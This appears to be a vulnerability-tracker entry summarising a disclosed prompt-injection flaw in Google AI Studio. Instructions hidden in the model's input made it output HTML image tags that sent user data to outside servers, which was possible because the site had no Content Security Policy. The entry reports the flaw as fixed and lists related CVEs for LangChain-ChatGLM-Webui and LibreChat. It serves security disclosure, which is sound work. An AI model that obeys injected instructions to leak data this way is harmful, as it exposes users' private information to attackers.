Google AI Studio: LLM-Powered Data Exfiltration Hits Again! Quickly Fixed.
Summary
A researcher discovered a security flaw in Google AI Studio where prompt injection (tricking an AI by hiding instructions in its input) allowed data exfiltration (stealing data) through HTML image tags rendered by the system. The vulnerability worked because Google AI Studio lacked a Content Security Policy (a security rule that restricts where a webpage can load resources from), making it possible to send data to unauthorized servers.
Classification
Affected Vendors
Related Issues
CVE-2025-45150: Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view and download sensitive
CVE-2025-54868: LibreChat is a ChatGPT clone with additional features. In versions 0.0.6 through 0.7.7-rc1, an exposed testing endpoint
Original source: https://embracethered.com/blog/posts/2024/google-ai-studio-data-exfiltration-now-fixed/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 85%